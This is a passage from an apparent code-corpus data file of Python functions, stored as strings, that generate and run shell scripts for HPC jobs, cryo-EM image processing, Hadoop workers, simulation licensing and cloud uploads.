jobname=self.name\n outdir=self.outd\n qsubdir=scratchdir+'/qsub/'+todayDate() #subdirectory to deposit the script\n if not os.path.exists(qsubdir): pastry('/bin/mkdir -p '+qsubdir)\n script=qsubdir+'/'+jobname+'.sh' #full script file name\n\n if len(jobname) > 15:\n sys.stderr.write('Error: job name '+jobname+' cannot exceed 15 characters')\n return ''\n if not os.path.exists(outdir): os.system('/bin/mkdir -p '+outdir)\n buf=''\n ulimit=int(float(mem_limit)*1024) #maximum resident memory size (Kb) to prevent swapping\n wd=tmpd+'/${PBS_JOBID}'\n #wd=tmpd+'/'+ re.compile('\\W').sub('',self.name) +'_$$' #working directory\n logname=jobname+'.log'\n local_log=wd+'/'+logname\n remote_log=outdir+'/'+logname\n buf= '#!/bin/bash\\n\\n'\n buf+= PBSoptions+'\\n\\n'\n buf+= '#bash function to update library\\n'\n buf+= self.updateNodeLib(libRev)+'\\n\\n'\n buf+= '#bash function to import temporary libs\\n'\n buf+= self.shared_temporal_libraries()+'\\n\\n'\n buf+= '#bash function to clean exit\\n'\n buf+= self.cleanup_exit(submode=submode)+'\\n\\n'\n buf+= 'echo \"'+script+'\"\\n' #write script name withing script body\n buf+= 'hostname\\n' #node where job will be run\n buf+= 'echo $PBS_JOBID\\n'\n buf+= 'ulimit -m '+`ulimit`+' #maximum memory\\n'\n buf+= 'source ~/.bash_profile >/dev/null #environment variables\\n'\n buf+= 'wd='+wd+' #working directory\\n'\n buf+= '/bin/mkdir -p $wd\\n'\n buf+= 'export LOCAL_LOG=\"'+local_log+'\"\\n'\n buf+= '/bin/touch $LOCAL_LOG\\n'\n if submode=='sub' and redirect:\n buf+='exec &> $LOCAL_LOG #redirect STODOUT, STDERR to LOCAL_LOG\\n' \n buf+= 'export REMOTE_LOG=\"'+remote_log+'\"\\n'\n\n but+= '#clean up old log file\\n'\n buf+= 'if [ -f $REMOTE_LOG ]; then\\n' \n buf+= ' /bin/rm -f $REMOTE_LOG\\n'\n buf+= 'fi\\n\\n'\n\n buf+= 'trap \"cleanup_exit 1\" TERM #in case of killing job\\n\\n'\n\n buf+= '#update node code library && import libraries\\n'\n buf+= 'if !('\n buf+= 'updateNodeLib && ' \n buf+= 'shared_temporal_libraries _PREPARE_'\n buf+= ');then\\n'\n buf+= ' cleanup_exit 1\\n'\n buf+= 'fi\\n\\n'\n \n buf+= '/bin/cp '+' '.join(self.inpl)+' $wd #bring input files\\n' \n buf+= 'cd $wd\\n\\n'\n buf+= '#Test command success\\n'\n buf+= 'exs=0 #variable holding script exit status\\n'\n buf+= 'if !('\n buf+= self.exe\n buf+= ');then\\n'\n buf+= ' exs=1\\n'\n buf+= 'fi\\n\\n'\n buf+= '#move even partial results (exs=1)\\n'\n buf+= '/bin/mv '+' '.join(self.outl)+' '+outdir+'\\n'\n buf+= 'cleanup_exit $exs'\n\n open(script,'w').write(buf)\n pastry('chmod u+x '+script)\n\n return script", "def createbash(self,executable,**keywords):\n\t\timport os\n\t\timport stat\n\n\t\toutputname = os.path.join(\"Results\",self.outputfile.replace(\".root\",\"_${SGE_TASK_ID}.root\"))\n\t\t# Extract the input files\n\t\tinputfiles = \"\"\n\t\tfor f in self.inputfiles:\n\t\t\tinputfiles += f+\",\"\n\t\tinputfiles = inputfiles[:-1]\n\n\t\tlines = \"#!/bin/bash\\n\"\n\t\tlines += \"\\n# Script created automatically by skimfiles.py utility\\n\"\n\t\tlines += \"\\nmkdir -p Results\\n\"\n\t\tlines += \"export PATH=$PATH:\"+os.path.join(self.basedir,\"bin\")+\":\"+os.path.join(self.pkgpath,\"bin\")+\"\\n\"\n\t\tlines += \"export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:\"+self.libsdir+\"\\n\"\n\t\tlines += \"\\n\"\n\t\tlines += \"EVENTFILE=\"+self.eventsfile+\"\\n\"\n\t\tlines += \"EVENTS=$(cat $EVENTFILE | head -n $SGE_TASK_ID | tail -n 1)\\n\"\n\t\tlines += executable+\" \"+self.cutid+\" -i \"+inputfiles+\" -c \"+self.cutfile+\\\n\t\t\t\t\" -e $EVENTS -o \"+outputname+\"\\n\"\n\t\n\t\tfilename = self.nameID+\".sh\"\n\t\tf = open(filename,\"w\")\n\t\tf.writelines(lines)\n\t\tf.close()\n\t\tos.chmod(filename,stat.S_IRWXU+stat.S_IRGRP+stat.S_IXGRP+stat.S_IXOTH)\n\t\t\n\t\treturn filename", "def create_sh_script(\n unblur_path, input_image, output_dir,\n input_dir, input_suffix, options\n ):\n strSh = ''\n\n # To make sure it is a bash script\n strSh += '#!/bin/bash\\n\\n'\n\n # Export number of threads\n strSh += 'export OMP_NUM_THREADS={:d}\\n'.format(options.nr_threads)\n\n # The script will abort with non-zero exit values\n strSh += '# The script will abort with non-zero exit values\\n'\n strSh += 'set -e\\n'\n\n # Create a file list of all files\n strSh += '# Create a file list of all files\\n'\n strSh += 'fileList=$(ls {:s})\\n'.format(\n input_image\n )\n\n # Create folders\n strSh += '# Create folders\\n'\n strSh += 'mkdir -p {:s}/Doseuncorrected\\n'.format(output_dir)\n\n strSh += 'mkdir -p {:s}/Shift\\n'.format(output_dir)\n\n strSh += 'mkdir -p {:s}/Temp\\n'.format(output_dir)\n\n if options.filter_sum:\n strSh += 'mkdir -p {:s}/Filtered\\n'.format(output_dir)\n\n if options.dose_filter:\n strSh += 'mkdir -p {:s}/Dosecorrected\\n'.format(output_dir)\n\n if options.expert_mode:\n strSh += 'mkdir -p {:s}/FRC\\n\\n'.format(output_dir)\n\n # Abort script if files in Doseuncorrected already exists\n strSh += '# Abort script if files in Doseuncorrected already exists\\n'\n strSh += 'for f in {:s}/Doseuncorrected/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in shift already exists\n strSh += '# Abort script if files in shift already exists\\n'\n strSh += 'for f in {:s}/Shift/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in Dosecorrected already exists\n strSh += '# Abort script if files in Dosecorrected already exists\\n'\n strSh += 'for f in {:s}/Dosecorrected/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in Filtered already exists\n strSh += '# Abort script if files in Filtered already exists\\n'\n strSh += 'for f in {:s}/Filtered/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Abort script if files in FRC already exists\n strSh += '# Abort script if files in FRC already exists\\n'\n strSh += 'for f in {:s}/FRC/*\\n'.format(output_dir)\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'echo \"Some files already exists, please choose another output directory\"\\n'\n strSh += 'exit 1\\n'\n strSh += 'break\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Loop over all files\n strSh += '\\nfor file in $fileList\\ndo\\n\\n'\n\n strSh += 'baseName=${{file%{:s}}}\\n'.format(input_suffix)\n strSh += 'baseName=${{baseName#{:s}}}\\n'.format(input_dir)\n\n # Create a temporary file to work with to prevent format issues\n strSh += '# Create a temporary file to work with to prevent format issues\\n'\n strSh += 'e2proc3d.py $file {:s}/Temp/${{baseName}}_temp.mrc\\n\\n'.format(output_dir)\n\n # Remove some temporary files that unblur makes\n strSh += '# Remove some temporary files that unblur makes\\n'\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh += 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # Start Unblur without dose correction\n strSh += '{:s} << eof\\n'.format(unblur_path)\n\n # Input File\n strSh += '{:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n # Number of Frames\n strSh += '{:d}\\n'.format(options.nr_frames)\n # Sum File\n strSh += '{:s}/Doseuncorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n # Shift File\n strSh += '{:s}/Shift/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.shift_suffix\n )\n # Pixel Size\n strSh += '{:f}\\n'.format(options.pixel_size)\n\n # Say no to Dose Filtering\n strSh += 'NO\\n'\n\n if options.save_frames:\n # Say yes to Save Frames\n strSh += 'YES\\n'\n # Frames file\n strSh += '{:s}/Doseuncorrected/${{baseName}}{:s}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix,\n options.frames_suffix\n )\n else:\n # Say no to Save Frames\n strSh += 'NO\\n'\n\n if options.expert_mode:\n # Say yes to Expert Mode\n strSh += 'YES\\n'\n # FRC File\n strSh += '{:s}/FRC/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.frc_suffix\n )\n # Minimum Shift for initial search\n strSh += '{:f}\\n'.format(options.shift_initial)\n # Outer Radius Shift Limit\n strSh += '{:f}\\n'.format(options.shift_radius)\n # B-Factor to Apply\n strSh += '{:f}\\n'.format(options.b_factor)\n # Half-Width Vertical\n strSh += '{:d}\\n'.format(options.fourier_vertical)\n # Hald-Width Horizontal\n strSh += '{:d}\\n'.format(options.fourier_horizontal)\n # Termination Shift Threshold\n strSh += '{:f}\\n'.format(options.shift_threshold)\n # Maximum Iterations\n strSh += '{:d}\\n'.format(options.iterations)\n # Restore Noise Power\n if options.restore_noise:\n # Say yes to Restore Noise Power\n strSh += 'YES\\n'\n else:\n # Say no to Restore Noise Power\n strSh += 'NO\\n'\n # Verbose Output\n if options.verbose:\n # Say yes to Verbose Output\n strSh += 'YES\\n'\n else:\n # Say no to Verbose Output\n strSh += 'NO\\n'\n else:\n # Say no to Expert Mode\n strSh += 'NO\\n'\n\n # Enf of file reached\n strSh += 'eof\\n\\n'\n\n # Remove some temporary files that unblur makes\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh += 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n # =========== #\n if options.dose_filter:\n\n # Start Unblur with dose correction\n strSh += '{:s} << eof\\n'.format(unblur_path)\n\n # Input File\n strSh += '{:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n # Number of Frames\n strSh += '{:d}\\n'.format(options.nr_frames)\n # Sum File\n strSh += '{:s}/Dosecorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n # Shift File\n strSh += '{:s}/Shift/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.shift_suffix\n )\n # Pixel Size\n strSh += '{:f}\\n'.format(options.pixel_size)\n\n # Say yes to Dose Filtering\n strSh += 'YES\\n'\n # Exposure per Frame\n strSh += '{:f}\\n'.format(options.exposure_per_frame)\n # Acceleration Voltage\n strSh += '{:f}\\n'.format(options.voltage)\n # Pre Exposure\n strSh += '{:f}\\n'.format(options.pre_exposure)\n\n if options.save_frames:\n # Say yes to Save Frames\n strSh += 'YES\\n'\n # Frames file\n strSh += '{:s}/Dosecorrected/${{baseName}}{:s}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix,\n options.frames_suffix\n )\n else:\n # Say no to Save Frames\n strSh += 'NO\\n'\n\n if options.expert_mode:\n # Say yes to Expert Mode\n strSh += 'YES\\n'\n # FRC File\n strSh += '{:s}/FRC/${{baseName}}{:s}.txt\\n'.format(\n output_dir,\n options.frc_suffix\n )\n # Minimum Shift for initial search\n strSh += '{:f}\\n'.format(options.shift_initial)\n # Outer Radius Shift Limit\n strSh += '{:f}\\n'.format(options.shift_radius)\n # B-Factor to Apply\n strSh += '{:f}\\n'.format(options.b_factor)\n # Half-Width Vertical\n strSh += '{:d}\\n'.format(options.fourier_vertical)\n # Hald-Width Horizontal\n strSh += '{:d}\\n'.format(options.fourier_horizontal)\n # Termination Shift Threshold\n strSh += '{:f}\\n'.format(options.shift_threshold)\n # Maximum Iterations\n strSh += '{:d}\\n'.format(options.iterations)\n # Restore Noise Power\n if options.restore_noise:\n # Say yes to Restore Noise Power\n strSh += 'YES\\n'\n else:\n # Say no to Restore Noise Power\n strSh += 'NO\\n'\n # Verbose Output\n if options.verbose:\n # Say yes to Verbose Output\n strSh += 'YES\\n'\n else:\n # Say no to Verbose Output\n strSh += 'NO\\n'\n else:\n # Say no to Expert Mode\n strSh += 'NO\\n'\n\n # Enf of file reached\n strSh += 'eof\\n\\n'\n\n # Remove temporary file\n strSh += 'rm {:s}/Temp/${{baseName}}_temp.mrc\\n'.format(output_dir)\n\n # Remove some temporary files that unblur makes\n # Remove some temporary files that unblur makes\n strSh += 'for f in .UnBlur*\\n'\n strSh += 'do\\n'\n strSh += 'if [ -e $f ]\\n'\n strSh += 'then\\n'\n strSh += 'rm .UnBlur*\\n'\n strSh += 'break\\n'\n strSh += 'else\\n'\n strSh += 'true\\n'\n strSh += 'fi\\n'\n strSh += 'done\\n\\n'\n\n if options.filter_sum:\n # Filter Images\n lowpass_angstrom = options.pixel_size / options.lowpass\n highpass_angstrom = options.pixel_size / options.highpass\n strSh += \\\n 'e2proc3d.py {:s}/Doseuncorrected/${{baseName}}{:s}.mrc '.format(\n output_dir,\n options.sum_suffix\n )\n strSh += '{:s}/Filtered/${{baseName}}{:s}.mrc ' \\\n .format(\n output_dir,\n options.sum_suffix\n )\n strSh += '--process=filter.lowpass.gauss:cutoff_freq={:f} '.format(\n options.lowpass\n )\n strSh += '--process=filter.highpass.gauss:cutoff_freq={:f}\\n\\n' \\\n .format(\n options.highpass\n )\n\n if options.remove_sum:\n # Remove sum files\n strSh += 'rm {:s}/Doseuncorrected/${{baseName}}{:s}.mrc\\n'.format(\n output_dir,\n options.sum_suffix\n )\n\n # Done\n strSh += 'done\\n\\n'\n\n # Remove temp folder\n strSh += 'rm -r {:s}/Temp\\n'.format(output_dir)\n\n strSh += 'echo \"All done!\"'\n\n # Write Output\n with open('{:s}/scriptUnblur.sh'.format(output_dir), 'w') as f:\n f.write(strSh)", "def do_install(self, args):\n if args:\n try:\n plugin_name, file_path = args.split()[0], args.split()[1]\n except Exception as e:\n return print(display_messages(\"the argument is invalid please type ?install for more information\", error=True))\n if not path.isfile(file_path):\n return print(\n display_messages(\n \"the file {} not found \".format(file_path), error=True\n )\n )\n head, tail = os.path.split(file_path)\n dest = copyfile(file_path, \"{}/{}\".format(self.temp_path, tail))\n print(display_messages(\"copy content file .zip to {}\".format(dest), info=True))\n \n path_to_zip_file = tempfile.gettempdir() + \"/{}\".format(tail)\n with ZipFile(path_to_zip_file, \"r\") as zip_ref:\n zip_ref.extractall(tempfile.gettempdir())\n temp_path_file_extracted = \"{}/{}.py\".format(self.temp_path, plugin_name)\n print(\n display_messages(\n \"extracted files on : {}\".format(temp_path_file_extracted), info=True\n )\n )\n if not path.isfile(temp_path_file_extracted):\n return print(\n display_messages(\n \"the file {} not found \".format(temp_path_file_extracted), error=True\n )\n )\n temp_templates_path = \"{}/{}\".format(self.temp_path, plugin_name)\n if not path.isdir(temp_templates_path):\n return print(\n display_messages(\n \"the directory template {} not found \".format(temp_templates_path), error=True\n )\n )\n source = temp_path_file_extracted\n destination = \"{}/{}.py\".format(self.captiveflask_setup_path, plugin_name)\n dest = copyfile(source, destination)\n print(display_messages(\"copy content file to {}\".format(dest), info=True))\n\n copy_tree(\n temp_templates_path, C.user_config_dir + \"/config/templates/{}\".format(plugin_name)\n )\n print(\n display_messages(\n \"plugin {} install {}\".format( plugin_name,setcolor(\"sucessful\", color=\"green\")),\n info=True,\n )\n )\n return \n print(\n display_messages(\"unknown command: {} \".format(args), error=True)\n )", "def install():\n execute(generate)\n execute(upload)", "def main():\n # Create / clean output dir\n if os.path.isdir(OUT_DIR):\n shutil.rmtree(OUT_DIR)\n os.mkdir(OUT_DIR)\n\n # Write all assets to the directory\n for fname, bb in create_assets().items():\n filename = os.path.join(OUT_DIR, fname)\n dirname = os.path.dirname(filename)\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n with open(filename, \"wb\") as f:\n f.write(bb)", "def main(args):\n\n #gets urls based on sections and creates basic directories\n stack_exchange_data = get_data(args.filename)\n zip_directory, corpus_directory = args.zip_path, args.dest_path\n setup(zip_directory, corpus_directory)\n\n for (section, url) in stack_exchange_data:\n #creates directories for the current SE site\n zip_file_path, unzipped_folder, corpus_section_directory = section_setup(\n section, zip_directory, corpus_directory)\n\n done_signal_path = os.path.join(corpus_section_directory, \".done\")\n if os.path.isfile(done_signal_path):\n continue\n\n print(\"Starting \" + section)\n\n #downloads and unzips data release for a site\n load(url, zip_file_path, unzipped_folder)\n\n #gets the links data from the links table for the site\n links = get_links(unzipped_folder)\n\n #gets post data from the posts table\n posts = get_posts(unzipped_folder)\n\n #gets post history\n posthistory = get_post_history(unzipped_folder)\n\n #creates the clusters of related and duplicate posts for a site,\n #based on links data\n # clusters, related, duplicates, unique_posts = gen_clusters(links)\n clusters = iter_clusters(links, posts, posthistory)\n\n #writes cluster information to json files\n write_json_files(clusters, corpus_section_directory)\n \n # put completion marker in folder so we can skip it next time\n with open(done_signal_path, \"w\") as f:\n print(\"\", file=f)\n\n print(\"Completed \" + section)", "def do_pack():\n\n datenow = datetime.now()\n full_date = datenow.strftime(\"%Y%m%d%H%M%S\")\n\n try:\n if not os.path.isdir(\"versions\"):\n local(\"mkdir versions\")\n local_command = local(\"tar -cvzf versions/web_static_{}.tgz web_static\"\n .format(full_date))\n return local_command\n except Exception:\n return None", "def createCase(foamCase, baseCase):\n if 'copyCase.sh' in os.listdir(baseCase):\n f = open('createNewCase.sh', 'w')\n writeLine = 'cd ' + baseCase + ' && ./copyCase.sh ' + foamCase \n f.write(writeLine)\n f.close()\n os.system('./createNewCase.sh')\n os.remove(os.getcwd()+'/createNewCase.sh')\n else:\n print(\"ERROR. The script 'copyCase.sh' is not present in the baseCase directory. Please add this\")\n return 0", "def zip_imagenet100c():\n #First make sure the directory we are given is correct!\n if not os.path.isdir(DATA_SRC_ROOT):\n raise Exception(\"Bad filepath given\")\n\n #create the destiantion directories if they don't exist\n if not os.path.isdir(IMAGENET100_DIR):\n os.mkdir(IMAGENET100_DIR)\n\n #grab the subset wnids for the 100 class-subset\n with open(IMAGENET100_CLASSES) as f:\n subset_wnids = f.readlines()\n subset_wnids = [x.strip() for x in subset_wnids] #list of the 100 WNIDs we grab\n\n #Grab the names of all of the folders inside the root data source\n #Structure is distortion/sub_distortion/level/wnids\n for distortion in os.listdir(DATA_SRC_ROOT):\n if distortion != \"meta.bin\":\n print(distortion)\n\n folder_path = os.path.join(DATA_SRC_ROOT, distortion)\n\n if not os.path.isdir(folder_path):\n continue\n\n for sub_distortion in os.listdir(folder_path):\n print(sub_distortion)\n\n subfolder_path = os.path.join(folder_path, sub_distortion)\n\n if not os.path.isdir(subfolder_path):\n continue\n\n for level in os.listdir(subfolder_path):\n print(level)\n\n level_path = os.path.join(subfolder_path, level)\n\n #grab the correcrt validation d9recotires\n for wnid in os.listdir(level_path):\n wnid_path = os.path.join(level_path, wnid)\n\n if not os.path.isdir(wnid_path):\n continue\n\n if wnid in subset_wnids:\n dest_path = os.path.join(IMAGENET100_DIR, distortion, sub_distortion, level, wnid)\n\n shutil.copytree(wnid_path, dest_path)\n\n #copy the metadata bin file\n meta_file = os.path.join(DATA_SRC_ROOT, 'meta.bin')\n meta_dest = os.path.join(IMAGENET100_DIR, 'meta.bin')\n\n shutil.copy(meta_file, meta_dest)\n\n #Zip the destinatio file\n shutil.make_archive(ZIP_PATH + '/ImageNet100C', 'tar', IMAGENET100_DIR)", "def runUploads():\n os.system(\"chmod u+x uploadCommands.sh\")\n os.system(\"./uploadCommands.sh\")\n os.system(\"rm uploadCommands.sh\")", "def output_transfer_prep(wcl, jobfiles, putinfo, task_label, exitcode):\n\n mastersave = wcl.get(pfwdefs.MASTER_SAVE_FILE).lower()\n mastercompress = wcl.get(pfwdefs.MASTER_COMPRESSION)\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"%s: mastersave = %s\" % (task_label, mastersave))\n miscutils.fwdebug_print(\"%s: mastercompress = %s\" % (task_label, mastercompress))\n\n # make archive rel paths for transfer\n saveinfo = {}\n for key, fdict in putinfo.items():\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"putinfo[%s] = %s\" % (key, fdict))\n should_save = pfwutils.should_save_file(mastersave, fdict['filesave'], exitcode)\n if should_save:\n if 'path' not in fdict:\n miscutils.fwdebug_print(\"Error: Missing path (archivepath) in file definition\")\n print key, fdict\n sys.exit(1)\n should_compress = pfwutils.should_compress_file(mastercompress,\n fdict['filecompress'],\n exitcode)\n fdict['filecompress'] = should_compress\n fdict['dst'] = \"%s/%s\" % (fdict['path'], os.path.basename(fdict['src']))\n saveinfo[key] = fdict\n\n call_compress_files(wcl, jobfiles, saveinfo)\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"After compress saveinfo = %s\" % (saveinfo))\n\n return saveinfo", "def _generate_hadoop_shell_script(arg_list, shell_env, working_dir, turi_dist_path, **kwargs):\n script_file = tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"script file name: \" + script_file.name)\n\n filenames_needed = ['dml_commander_startup',\n 'dml_worker_startup',\n 'libdml_toolkits.so',\n 'libdml_shared.so',\n 'libhdfs.so',\n 'libminipsutil.so',\n 'libc++abi.so.1']\n\n copy_cmd = \"hadoop fs -copyToLocal \" + turi_dist_path + \"/\"\n for i in filenames_needed:\n script_file.write(copy_cmd + DD_BINS_PATH + i + '\\n')\n\n script_file.write(\"chmod 755 ./dml_commander_startup\\n\")\n script_file.write(\"chmod 755 ./dml_worker_startup\\n\")\n script_file.write(\"export LD_LIBRARY_PATH=${JAVA_HOME}/jre/lib/amd64/server:${LD_LIBRARY_PATH}\\n\")\n script_file.write(\"export CLASSPATH=$(hadoop classpath --glob)\\n\")\n for k, v in shell_env.items():\n script_file.write(\"export %s=%s\\n\" % (str(k), str(v)))\n\n script_file.write(\"env\\n\")\n #script_file.write(\"if [ $MY_RANK -eq 0 ]; then\\n\")\n #script_file.write(\" stress --vm-bytes 4g --vm-keep -m 1 --timeout 30\\n\")\n #script_file.write(\"fi\\n\")\n script_file.write(\"if [ $MY_RANK -eq 0 ]; then\\n\")\n script_file.write(\" echo Starting commander\\n\")\n script_file.write(\" ./dml_commander_startup \")\n for arg in arg_list[0]:\n if len(arg) > 7 and arg[0:7] == \"--args=\":\n script_file.write(arg[0:7] + '\"' + arg[7:] + '\" ')\n else:\n script_file.write(arg + \" \")\n script_file.write(\"> >(tee commander.log.stdout) 2> >(tee commander.log.stderr >&2)\")\n script_file.write(\"\\n\")\n script_file.write(\" echo Uploading commander log\\n\")\n script_file.write(\" hadoop fs -put \" + \"./commander.log.stdout \" +\n \"/\".join([working_dir, 'commander.log'])+\".stdout\\n\")\n script_file.write(\" hadoop fs -put \" + \"./commander.log.stderr \" +\n \"/\".join([working_dir, 'commander.log'])+\".stderr\\n\")\n script_file.write(\"else\\n\")\n script_file.write(\" let MY_RANK=$MY_RANK-1\\n\")\n script_file.write(\" echo Starting worker $MY_RANK\\n\")\n script_file.write(\" ./dml_worker_startup \")\n for arg in arg_list[1]:\n script_file.write(arg + \" \")\n script_file.write(\"> >(tee worker.log.stdout) 2> >(tee worker.log.stderr >&2)\")\n script_file.write(\"\\n\")\n script_file.write(\" echo Uploading worker $MY_RANK log\\n\")\n script_file.write(\" hadoop fs -put \" + \"./worker.log.stdout \" +\n \"/\".join([working_dir, \"worker_${MY_RANK}.log\"])+\".stdout\\n\")\n script_file.write(\" hadoop fs -put \" + \"./worker.log.stderr \" +\n \"/\".join([working_dir, \"worker_${MY_RANK}.log\"])+\".stderr\\n\")\n script_file.write(\"fi\\n\")\n script_file.close()\n return script_file.name", "def do_pack():\n now = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n local('mkdir -p versions')\n result = local('tar -czvf versions/web_static_{}.tgz web_static'\n .format(now))\n if result.failed:\n return None\n else:\n return result", "def create_file_structure_for_packages(root_folder, file_to_copy, object_name):\n upload_package_folder = os.path.join(\n root_folder, object_name, 'coala' + object_name)\n os.makedirs(upload_package_folder, exist_ok=True)\n touch(os.path.join(upload_package_folder, '__init__.py'))\n shutil.copyfile(file_to_copy, os.path.join(upload_package_folder,\n object_name + '.py'))", "def write_flow_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch2File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java Simulation.sim\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset simFile=$2\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set simFile=$3\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" % (str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Simulation\"\necho \"# Java Batch File = $javaBatchFile\"\necho \"# sim File = $simFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset lnodes=`cat $PBS_NODEFILE`\nset llnodes = `echo $lnodes | sed 's/ /,/g'`\n#echo \"llnodes = $llnodes\"\nset numCores = `echo $llnodes | sed 's/,/ /g' | wc -w`\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -on $llnodes \\\\\n -rsh 'ssh -o stricthostkeychecking=no' \\\\\n -classpath ~/bin \\\\\n -load \\\\\n -batch $javaBatchFile \\\\\n $simFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def main():\n arg_parser = argparse.ArgumentParser(description='Transfer data files to AWS S3 bucket.')\n arg_parser.add_argument('mission', action='store', help='Mission data to be transferred.')\n arg_parser.add_argument('target', action='store', help='Which AWS account to receive data.')\n args = arg_parser.parse_args()\n mission = args.mission\n target = args.target.upper()\n\n config = configparser.ConfigParser()\n config.read('aws.ini')\n bucket = config[target]['bucket']\n access_key_id = config[target]['access_key']\n secret_key_id = config[target]['secret_key']\n\n source_dir = os.path.join(OUTBOUND, mission)\n dir_list = get_target_list(source_dir)\n for directory in dir_list:\n if directory.endswith('_TIF'):\n file_dir = os.path.join(source_dir, directory)\n files = get_target_list(file_dir)\n for file in files:\n upload_to_aws(file_dir + file, bucket, mission + f'/{directory}/{file}',\n access_key_id, secret_key_id)", "def main():\n\n\n\n skulls_folder = os.listdir(RAW_IMAGE_DIRECTORY)\n\n # fetch and sort the .mnc and .tag files\n mnc_files = [f for f in skulls_folder if 'mnc' in f]\n tag_files = [f for f in skulls_folder if 'tag' in f]\n mnc_names = [i.split('.mnc')[0] for i in mnc_files]\n \n mnc_files.sort()\n tag_files.sort()\n mnc_names.sort()\n\n # Process and package ndarrays as tuples inside npy file\n package_to_npy(RAW_IMAGE_DIRECTORY, mnc_files, tag_files, mnc_names)\n \n print('\\n' * 5)\n\n # Push the npy files to GCP Cloud Storage\n upload_to_gcp(PROCESSED_IMAGE_DIRECTORY, GCP_PROJECT_NAME, GCP_BUCKET_NAME)", "def main():\n parser = argparse.ArgumentParser(description='ivector runner')\n parser.add_argument('--wav-dir', required=True,\n help='directory to original audio files')\n parser.add_argument('--label-file', required=True,\n help='label files')\n parser.add_argument('--out-dir', required=True,\n help='output directory to data')\n args = parser.parse_args()\n\n tmp_dir = os.path.join(args.out_dir, \"tmp\")\n utt2spk_path = os.path.join(args.out_dir, \"utt2spk\")\n wavscp_path = os.path.join(args.out_dir, \"wav.scp\")\n\n if (os.system(\"mkdir -p %s\" % (tmp_dir)) != 0):\n 